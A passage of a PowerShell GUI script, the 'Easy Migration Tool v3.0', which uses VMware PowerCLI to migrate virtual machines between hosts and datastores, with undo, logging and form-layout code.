{
$CheckedVMs += $VM
}
$SourceVMListBox.Items.Clear()
Foreach($CheckedVM in $CheckedVMs)
{
[void]$SourceVMListBox.items.add($CheckedVM)
$SourceVMListBox.SetItemChecked($SourceVMListBox.items.IndexOf($CheckedVM),$true)
}
}
$BeforeCount = $SourceVMListBox.Items.Count
If($HostToHostButton.BackColor -eq [System.Drawing.Color]::lightblue)
{
Get-VMHost -Name $SourceHostname | Get-VM -Name $FindVMTxtBox.Text -ErrorAction SilentlyContinue | % { [void]$SourceVMListBox.items.add($_.Name) }
}
Else
{
Get-Cluster -Name $ClusterName | Get-VM -Name $FindVMTxtBox.Text -ErrorAction SilentlyContinue | % { [void]$SourceVMListBox.items.add($_.Name) }
}
}
$AfterCount = $SourceVMListBox.Items.Count
If($AfterCount -eq $BeforeCount)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('No results found.')
}
}
$ResetFindVMBtn_OnClick=
{
#TODO: Place custom script here
$SourceVMListBox.Items.Clear()
$FindVMTxtBox.Text = ""
If($HostToHostButton.BackColor -eq [System.Drawing.Color]::lightblue)
{
Get-VMHost -Name $SourceHostname | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) }
}
Else
{
Get-Cluster -Name $ClusterName | Get-VM | % { [void]$SourceVMListBox.items.add($_.Name) }
}
}
$MigrateButton_OnClick=
{
#TODO: Place custom script here
If ($SourceButton.Text -eq "Source - Select One Host")
{
$SourceHostname = $SourceHostListBox.SelectedItem
$DestinationName = $DestinationListBox.SelectedItem
$VMs = Get-VMHost $SourceHostname | Get-VM
foreach($VM in $VMs)
{
Get-VM -Name $VM | Move-VM -Destination (Get-VMHost -Name $DestinationName) -RunAsync -ErrorAction SilentlyContinue
If (!$?)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$d = Get-Date
$TaskLine = "$d - $VM migrated successfully from $SourceHostName to $DestinationName"
[void]$TaskListBox.items.add($TaskLine)
}
}
$SourceVMListBox.enabled = $true
$SourceButton.enabled = $true
$MigrateButton.Enabled = $false
$AllClustersCheckbox.Checked = $false
$DestinationListBox.Items.Clear()
$ClearMsgButton.Enabled = $true
$UndoButton.Enabled = $true
$UndoALLButton.Enabled = $true
$SaveTaskButton.Enabled = $true
}
If ($SourceButton.Text -eq "Source - Select VMs")
{
$DestinationName = $DestinationListBox.SelectedItem
If($DestinationButton.Text -eq "Destination Host")
{
foreach($VM in $SourceVMListBox.CheckedItems)
{
$SourceName = Get-VM -Name $VM | Get-VMHost | % {$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Destination (Get-VMHost -Name $DestinationName) -RunAsync -ErrorAction SilentlyContinue
If (!$?)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$d = Get-Date
$line = "$d - $VM migrated successfully from $SourceName to $DestinationName."
[void]$TaskListBox.items.add($line)
}
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
}
Else
{
foreach($VM in $SourceVMListBox.CheckedItems)
{
$VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024
$DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB}
$DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2}
$DBAvailableSpace = $DBFreeSpace - $DBReserved
$SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count
If ($VMsize -gt $DBAvailableSpace)
{
$VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024)
$DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024)
$DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024)
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)."
[void]$MessagesListBox.items.add($MsgLine)
}
ElseIf ($SnapshotCount -gt 0)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync -ErrorAction SilentlyContinue
If (!$?)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$d = Get-Date
$TaskLine = "$d - $VM migrated successfully from $SourceName to $DestinationName"
[void]$TaskListBox.items.add($TaskLine)
}
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
}
}
$SourceVMListBox.enabled = $true
$SourceButton.enabled = $true
$MigrateButton.Enabled = $false
$AllClustersCheckbox.Checked = $false
$DestinationListBox.Items.Clear()
$ClearMsgButton.Enabled = $true
$UndoButton.Enabled = $true
$UndoALLButton.Enabled = $true
$SaveTaskButton.Enabled = $true
}
If ($SourceButton.Text -eq "Source - Select a Datastore")
{
$SourceDBname = $SourceDBListBox.SelectedItem
$DestinationName = $DestinationListBox.SelectedItem
$VMs = Get-Datastore -Name $SourceDBname | Get-VM
If($VMs.count -gt 0)
{
foreach($VM in $VMs)
{
$VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024
$DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB}
$DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2}
$DBAvailableSpace = $DBFreeSpace - $DBReserved
$SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count
If ($VMsize -gt $DBFreeSpace)
{
$VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024)
$DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024)
$DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024)
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)."
[void]$MessagesListBox.items.add($MsgLine)
}
ElseIf ($SnapshotCount -gt 0)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync -ErrorAction SilentlyContinue
If (!$?)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because an exception occurred. Check the vCenter console for more details."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$d = Get-Date
$line = "$d - $VM migrated successfully from $SourceDBName to $DestinationName"
[void]$TaskListBox.items.add($line)
}
}
}
}
Else
{
$d = Get-Date
$MsgLine = "$d - No VM is present on the source datastore $SourceDBname."
[void]$MessagesListBox.items.add($MsgLine)
}
$SourceDBListBox.enabled = $true
$SourceButton.enabled = $true
$AllClustersCheckbox.Checked = $false
$DestinationListBox.Items.Clear()
$MigrateButton.Enabled = $false
$ClearMsgButton.Enabled = $true
$UndoButton.Enabled = $true
$UndoALLButton.Enabled = $true
$SaveTaskButton.Enabled = $true
}
}
$RESETButton_OnClick=
{
#TODO: Place custom script here
$ClusterComboBox.Enabled = $true
$HostToHostButton.Enabled = $true
$VMToHostButton.Enabled = $true
$DBtoDBButton.Enabled = $true
$VMtoDBButton.Enabled = $true
$SourceHostListBox.Items.Clear()
$SourceDBListBox.Items.Clear()
$SourceVMListBox.Items.Clear()
$SourceButton.Enabled = $false
$SourceButton.Text = 'Source'
$AllClustersCheckbox.Checked = $false
$DestinationListBox.Items.Clear()
$DestinationButton.Enabled = $false
$DestinationButton.Text = 'Destination'
$FindVMTxtBox.Enabled = $false
$FindVMTxtBox.Text = ""
$FindVMBtn.Enabled = $false
$ResetFindVMBtn.Enabled = $false
$MigrateButton.Enabled = $false
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Remove($SourceVMListBox)
$MigrationForm.Controls.Remove($SourceDBListBox)
$MigrationForm.Controls.Add($SourceHostListBox)
$HostToHostButton.BackColor = [System.Drawing.Color]::Transparent
$VMToHostButton.BackColor = [System.Drawing.Color]::Transparent
$DBtoDBButton.BackColor = [System.Drawing.Color]::Transparent
$VMtoDBButton.BackColor = [System.Drawing.Color]::Transparent
}
$ChangeVCButton_OnClick=
{
#TODO: Place custom script here
$VCComboBox.Text = ""
$VCComboBox.Enabled = $true
$LoginButton.Enabled = $true
$ClusterComboBox.Items.Clear()
$ClusterComboBox.Enabled = $false
$HostToHostButton.Enabled = $false
$VMToHostButton.Enabled = $false
$DBtoDBButton.Enabled = $false
$VMtoDBButton.Enabled = $false
$SourceHostListBox.Items.Clear()
$SourceDBListBox.Items.Clear()
$SourceVMListBox.Items.Clear()
$SourceButton.Enabled = $false
$SourceButton.Text = 'Source'
$AllClustersCheckbox.Checked = $false
$DestinationListBox.Items.Clear()
$DestinationButton.Enabled = $false
$DestinationButton.Text = 'Destination'
$MigrateButton.Enabled = $false
$ResetButton.Enabled = $false
$ChangeVCButton.Enabled = $false
$MessagesListBox.Items.Clear()
$TaskListBox.Items.Clear()
$MigrationForm.Controls.Remove($SourceHostListBox)
$MigrationForm.Controls.Remove($SourceVMListBox)
$MigrationForm.Controls.Remove($SourceDBListBox)
$MigrationForm.Controls.Add($SourceHostListBox)
$HostToHostButton.BackColor = [System.Drawing.Color]::Transparent
$VMToHostButton.BackColor = [System.Drawing.Color]::Transparent
$DBtoDBButton.BackColor = [System.Drawing.Color]::Transparent
$VMtoDBButton.BackColor = [System.Drawing.Color]::Transparent
#Disconnect from vCenter server
Disconnect-VIServer -Confirm:$false
}
$CloseButton_OnClick=
{
#TODO: Place custom script here
If ($VCComboBox.Text -ne "")
{
#Disconnect from vCenter server
Disconnect-VIServer -Confirm:$false
}
#Close Form
$MigrationForm.close()
}
$ClearMsgButton_Click=
{
#TODO: Place custom script here
If($MessagesListBox.items.count -eq 0)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('No messages to clear.')
}
Else
{
$MessagesListBox.items.clear()
}
}
$UndoButton_Click=
{
#TODO: Place custom script here
If ($TaskListBox.Items.Count -eq 0)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('The task list is empty.')
}
Else
{
If ($TaskListBox.SelectedItems.Count -eq 0)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Please select one or more tasks.')
}
Else
{
foreach($Task in $TaskListBox.SelectedItems)
{
$Task = $Task.split(" ")
$VM = $Task[3]
$DestinationName = $Task[7]
$a = $DestinationName.indexof("SAN")
If ($a -lt 0) #If Destination is NOT a datastore
{
#Perform VMotion
$SourceName = Get-VM -name $VM | Get-VMHost | %{$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Destination (Get-VMHost $DestinationName) -RunAsync
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
Else
{
#Perform SVMotion
$VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024
$DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB}
$DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2}
$DBAvailableSpace = $DBFreeSpace - $DBReserved
$SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count
If ($VMsize -gt $DBAvailableSpace)
{
$VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024)
$DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024)
$DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024)
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)."
[void]$MessagesListBox.items.add($MsgLine)
}
ElseIf ($SnapshotCount -gt 0)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
}
}
While($TaskListBox.SelectedItems.Count -gt 0)
{
$TaskListBox.Items.Remove($TaskListBox.SelectedItems[0])
}
}
}
}
$UndoALLButton_Click=
{
#TODO: Place custom script here
If ($TaskListBox.Items.Count -eq 0)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('The task list is empty.')
}
Else
{
foreach($Task in $TaskListBox.Items)
{
$Task = $Task.split(" ")
$VM = $Task[3]
$DestinationName = $Task[7]
$a = $DestinationName.indexof("SAN")
If ($a -lt 0) #If Destination is NOT a datastore
{
#Perform VMotion
$SourceName = Get-VM -name $VM | Get-VMHost | %{$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Destination (Get-VMHost $DestinationName) -RunAsync
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source host and the destination host are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
Else
{
#Perform SVMotion
$VMsize = ((Get-VM -Name $VM | Get-HardDisk | Measure-Object -property CapacityKB -Sum).Sum)/1024
$DBFreeSpace = Get-Datastore -Name $DestinationName | %{$_.FreeSpaceMB}
$DBReserved = Get-Datastore -Name $DestinationName | %{$_.CapacityMB * 0.2}
$DBAvailableSpace = $DBFreeSpace - $DBReserved
$SnapshotCount = (Get-VM -Name $VM | Get-Snapshot | Measure-Object).Count
If ($VMsize -gt $DBAvailableSpace)
{
$VMSizeGB = "{0:N1}GB" -f ($VMsize / 1024)
$DBFreeSpaceGB = "{0:N1} GB" -f ($DBFreeSpace / 1024)
$DBAvailableSpaceGB = "{0:N1} GB" -f ($DBAvailableSpace / 1024)
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM (Size = $VMSizeGB) because there is insufficient disk space on $DestinationName (Available = $DBAvailableSpaceGB)."
[void]$MessagesListBox.items.add($MsgLine)
}
ElseIf ($SnapshotCount -gt 0)
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because it has one or more snapshots."
[void]$MessagesListBox.items.add($MsgLine)
}
Else
{
$SourceName = Get-VM -Name $VM | Get-Datastore | % {$_.name}
If($SourceName -ne $DestinationName)
{
Get-VM -Name $VM | Move-VM -Datastore ($DestinationName) -RunAsync
}
Else
{
$d = Get-Date
$MsgLine = "$d - Cannot migrate $VM because the source datastore and the destination datastore are the same."
[void]$MessagesListBox.items.add($MsgLine)
}
}
}
}
$TaskListBox.Items.Clear()
}
}
$SaveTaskButton_Click=
{
#TODO: Place custom script here
If ($TaskListBox.items.count -eq 0)
{
[reflection.assembly]::loadwithpartialname('system.windows.forms')
[system.Windows.Forms.MessageBox]::show('Nothing to save to log file.')
}
Else
{
$SaveFileD = new-object System.Windows.Forms.SaveFileDialog
$SaveFileD.Filter = "Log Files (*.log)|*.log";
$SaveFileD.Title = "Save to a log file";
$SaveFileD.FilterIndex = 2;
$SaveFileD.RestoreDirectory = $true;
if ($SaveFileD.ShowDialog() -eq [System.Windows.Forms.DialogResult]::OK)
{
$FileName = $SaveFileD.FileName
$Tasks = $TaskListBox.items
$logheader = "Easy Migration Tool v3.0 - Log generated on " + (Get-Date)
#Save a log file for this session to a location selected by the user
Out-File -InputObject $logheader -FilePath $Filename
Out-File -InputObject "" -Append -FilePath $FileName
Out-File -InputObject $Tasks -Append -FilePath $FileName
}
}
}
$ReloadTaskButton_Click=
{
#TODO: Place custom script here
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
#$OpenFileDialog.initialDirectory = $initialDirectory
$OpenFileDialog.filter = "Log Files (*.log)|*.log"
if ($OpenFileDialog.ShowDialog() -eq [System.Windows.Forms.DialogResult]::OK)
{
$FileName = $OpenFileDialog.FileName
$LinesCount = (Get-Content $FileName).Count
$LogLines = Get-Content $FileName | Select -Last ($LinesCount - 2)
$TaskListBox.Items.Clear()
foreach ($LogLine in $LogLines)
{
[void]$TaskListBox.items.add($LogLine)
}
$ClearMsgButton.Enabled = $true
$UndoButton.Enabled = $true
$UndoALLButton.Enabled = $true
$SaveTaskButton.Enabled = $true
}
}
#----------------------------------------------
#region Generated Form Code
# Start Main Form
$MigrationForm.Text = 'Easy Migration Tool v3.0'
$MigrationForm.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$MigrationForm.Name = 'EasyMigrationForm'
$MigrationForm.StartPosition = "CenterScreen"
$MigrationForm.FormBorderStyle = "FixedDialog"
$MigrationForm.MaximizeBox = $false
$MigrationForm.MinimizeBox = $false
$MigrationForm.DataBindings.DefaultDataSourceUpdateMode = 0
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 1024
$System_Drawing_Size.Height = 768
$MigrationForm.ClientSize = $System_Drawing_Size
# End Main Form
#Start Easy_Migration Header
$Header.Font = new-object System.Drawing.Font("Tahoma",10,[System.Drawing.FontStyle]::Bold)
$Header.TextAlign = [System.Drawing.ContentAlignment]::MiddleLeft
$Header.Text = 'Easy Migration Tool v3.0'
$Header.Location = new-object System.Drawing.Point(150,15)
$Header.Size = new-object System.Drawing.Size(230, 20)
$MigrationForm.Controls.Add($Header)
#End Easy_Migration Header
# Start vCenter Server Label
$vCenterLabel.TabIndex = 2
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 95
$System_Drawing_Size.Height = 20
$vCenterLabel.Size = $System_Drawing_Size
$vCenterLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$vCenterLabel.Text = 'vCenter Server:'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 50
$vCenterLabel.Location = $System_Drawing_Point
$vCenterLabel.DataBindings.DefaultDataSourceUpdateMode = 0
$vCenterLabel.Name = 'vCenterLabel'
$MigrationForm.Controls.Add($vCenterLabel)
# End vCenter Server Label
# Start vCenter ComboBox
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 120
$System_Drawing_Size.Height = 20
$VCComboBox.Size = $System_Drawing_Size
$VCComboBox.Font = new-object System.Drawing.Font("Tahoma",8)
$VCComboBox.DataBindings.DefaultDataSourceUpdateMode = 0
$VCComboBox.Name = 'VCComboBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 125
$System_Drawing_Point.Y = 50
$VCComboBox.Location = $System_Drawing_Point
$VCComboBox.TabIndex = 0
$VCNames = @('vcserver01','vcserver02')
foreach($VCName in $VCNames)
{
$VCComboBox.Items.add($VCName)
}
$MigrationForm.Controls.Add($VCComboBox)
# End vCenter ComboBox
# Start Login Button
$LoginButton.TabIndex = 0
$LoginButton.Name = 'LoginButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 80
$System_Drawing_Size.Height = 22
$LoginButton.Size = $System_Drawing_Size
$LoginButton.Font = new-object System.Drawing.Font("Tahoma",8)
$LoginButton.UseVisualStyleBackColor = $True
$LoginButton.Text = 'Login'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 250
$System_Drawing_Point.Y = 50
$LoginButton.Location = $System_Drawing_Point
$LoginButton.DataBindings.DefaultDataSourceUpdateMode = 0
$LoginButton.add_Click($LoginButton_Click)
$MigrationForm.Controls.Add($LoginButton)
# End Login Button
# Start Change VC Button
$ChangeVCButton.TabIndex = 19
$ChangeVCButton.Name = 'ChangeVCButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 90
$System_Drawing_Size.Height = 22
$ChangeVCButton.Size = $System_Drawing_Size
$ChangeVCButton.Font = new-object System.Drawing.Font("Tahoma",8)
$ChangeVCButton.UseVisualStyleBackColor = $True
$ChangeVCButton.Text = 'Change vCenter'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 335
$System_Drawing_Point.Y = 50
$ChangeVCButton.Location = $System_Drawing_Point
$ChangeVCButton.DataBindings.DefaultDataSourceUpdateMode = 0
$ChangeVCButton.add_Click($ChangeVCButton_OnClick)
$ChangeVCButton.Enabled = $false
$MigrationForm.Controls.Add($ChangeVCButton)
# End Change VC Button
# Start Cluster Combobox
$ClusterLabel.TabIndex = 5
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 85
$System_Drawing_Size.Height = 20
$ClusterLabel.Size = $System_Drawing_Size
$ClusterLabel.Font = new-object System.Drawing.Font("Tahoma",8,[System.Drawing.FontStyle]::Bold)
$ClusterLabel.Text = 'Select Cluster:'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 40
$System_Drawing_Point.Y = 90
$ClusterLabel.Location = $System_Drawing_Point
$ClusterLabel.DataBindings.DefaultDataSourceUpdateMode = 0
$ClusterLabel.Name = 'ClusterLabel'
$MigrationForm.Controls.Add($ClusterLabel)
$ClusterComboBox.FormattingEnabled = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 120
$System_Drawing_Size.Height = 100
$ClusterComboBox.Size = $System_Drawing_Size
$ClusterComboBox.Font = new-object System.Drawing.Font("Tahoma",8)
$ClusterComboBox.DataBindings.DefaultDataSourceUpdateMode = 0
$ClusterComboBox.Name = 'ClusterComboBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 125
$System_Drawing_Point.Y = 90
$ClusterComboBox.Location = $System_Drawing_Point
$ClusterComboBox.TabIndex = 5
$ClusterComboBox.Enabled = $False
$MigrationForm.Controls.Add($ClusterComboBox)
# End Cluster Listbox
# Start Host to Host Button
$HostToHostButton.TabIndex = 3
$HostToHostButton.Name = 'HostToHostButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 85
$System_Drawing_Size.Height = 20
$HostToHostButton.Size = $System_Drawing_Size
$HostToHostButton.Font = new-object System.Drawing.Font("Tahoma",8)
$HostToHostButton.UseVisualStyleBackColor = $True
$HostToHostButton.Text = 'Host to Host'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 130
$HostToHostButton.Location = $System_Drawing_Point
$HostToHostButton.DataBindings.DefaultDataSourceUpdateMode = 0
$HostToHostButton.add_Click($HostToHostButton_Click)
$HostToHostButton.Enabled = $False
$MigrationForm.Controls.Add($HostToHostButton)
# End Host to Host Button
# Start VM to Host Button
$VMToHostButton.TabIndex = 3
$VMToHostButton.Name = 'VMToHostButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 90
$System_Drawing_Size.Height = 20
$VMToHostButton.Size = $System_Drawing_Size
$VMToHostButton.Font = new-object System.Drawing.Font("Tahoma",8)
$VMToHostButton.UseVisualStyleBackColor = $True
$VMToHostButton.Text = 'VM to Host'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 120
$System_Drawing_Point.Y = 130
$VMToHostButton.Location = $System_Drawing_Point
$VMToHostButton.DataBindings.DefaultDataSourceUpdateMode = 0
$VMToHostButton.add_Click($VMToHostButton_Click)
$VMToHostButton.Enabled = $false
$MigrationForm.Controls.Add($VMToHostButton)
# End VM to Host Button
# Start Datastore to Datastore Button
$DBtoDBButton.TabIndex = 3
$DBtoDBButton.Name = 'DBtoDBButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 130
$System_Drawing_Size.Height = 20
$DBtoDBButton.Size = $System_Drawing_Size
$DBtoDBButton.Font = new-object System.Drawing.Font("Tahoma",8)
$DBtoDBButton.UseVisualStyleBackColor = $True
$DBtoDBButton.Text = 'Datastore to Datastore'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 215
$System_Drawing_Point.Y = 130
$DBtoDBButton.Location = $System_Drawing_Point
$DBtoDBButton.DataBindings.DefaultDataSourceUpdateMode = 0
$DBtoDBButton.add_Click($DBtoDBButton_Click)
$DBtoDBButton.Enabled = $false
$MigrationForm.Controls.Add($DBtoDBButton)
# End Datastore to Datastore Button
# Start VM to Datastore Button
$VMtoDBButton.TabIndex = 3
$VMtoDBButton.Name = 'VMtoDBButton'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 100
$System_Drawing_Size.Height = 20
$VMtoDBButton.Size = $System_Drawing_Size
$VMtoDBButton.Font = new-object System.Drawing.Font("Tahoma",8)
$VMtoDBButton.UseVisualStyleBackColor = $True
$VMtoDBButton.Text = 'VM to Datastore'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 350
$System_Drawing_Point.Y = 130
$VMtoDBButton.Location = $System_Drawing_Point
$VMtoDBButton.DataBindings.DefaultDataSourceUpdateMode = 0
$VMtoDBButton.add_Click($VMtoDBButton_Click)
$VMtoDBButton.Enabled = $false
$MigrationForm.Controls.Add($VMtoDBButton)
# End VM to Datastore Button
# Start Source Host List Box
$SourceHostListBox.FormattingEnabled = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 415
$SourceHostListBox.Size = $System_Drawing_Size
$SourceHostListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$SourceHostListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$SourceHostListBox.Name = 'SourceHostListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 180
$SourceHostListBox.Location = $System_Drawing_Point
$SourceHostListBox.MultiColumn = $false
$SourceHostListBox.TabIndex = 5
$SourceHostListBox.Sorted = $True
$SourceHostListBox.HorizontalScrollbar = $true
$SourceHostListBox.add_MouseDoubleClick($SourceHostListBox_MouseDoubleClick)
$MigrationForm.Controls.Add($SourceHostListBox)
# End Source Host List Box
# Start Source Datastore List Box
$SourceDBListBox.FormattingEnabled = $True
$SourceDBListBox.CheckOnClick = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 415
$SourceDBListBox.Size = $System_Drawing_Size
$SourceDBListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$SourceDBListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$SourceDBListBox.Name = 'SourceDBListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 180
$SourceDBListBox.Location = $System_Drawing_Point
$SourceDBListBox.MultiColumn = $false
$SourceDBListBox.HorizontalScrollBar = $true
$SourceDBListBox.TabIndex = 5
$SourceDBListBox.Sorted = $True
$SourceDBListBox.HorizontalScrollbar = $true
# End Source Datastore List Box
# Start Source VM List Box
$SourceVMListBox.FormattingEnabled = $True
$SourceVMListBox.CheckOnClick = $True
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 415
$SourceVMListBox.Size = $System_Drawing_Size
$SourceVMListBox.Font = new-object System.Drawing.Font("Tahoma",8)
$SourceVMListBox.DataBindings.DefaultDataSourceUpdateMode = 0
$SourceVMListBox.Name = 'SourceVMListBox'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 180
$SourceVMListBox.Location = $System_Drawing_Point
$SourceVMListBox.MultiColumn = $false
$SourceVMListBox.TabIndex = 5
$SourceVMListBox.Sorted = $True
$SourceVMListBox.HorizontalScrollbar = $True
# End Source VM List Box
# Start Source Button
$SourceButton.TabIndex = 7
$SourceButton.Name = 'Source Button'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 200
$System_Drawing_Size.Height = 20
$SourceButton.Size = $System_Drawing_Size
$SourceButton.Font = new-object System.Drawing.Font("Tahoma",8)
$SourceButton.UseVisualStyleBackColor = $True
$SourceButton.Text = 'Source'
$System_Drawing_Point = New-Object System.Drawing.Point
$System_Drawing_Point.X = 30
$System_Drawing_Point.Y = 600
$SourceButton.Location = $System_Drawing_Point
$SourceButton.DataBindings.DefaultDataSourceUpdateMode = 0
$SourceButton.add_Click($SourceButton_OnClick)
$SourceButton.Enabled = $false
$MigrationForm.Controls.Add($SourceButton)
# End Source Button
# Start All Clusters Checkbox
$AllClustersCheckbox.TabIndex = 4
$AllClustersCheckbox.Name = 'AllClustersCheckbox'
$System_Drawing_Size = New-Object System.Drawing.Size
$System_Drawing_Size.Width = 150
$System_Drawing_Size.Height = 20
$AllClustersCheckbox.Size = $System_Drawing_Size
$AllClustersCheckbox.Font = new-object System.Drawing.Font("Tahoma",8)
$AllClustersCheckbox.UseVisualStyleBackColor = $True
$AllClustersCheckbox.Text = 'Show Hosts in All Clusters'
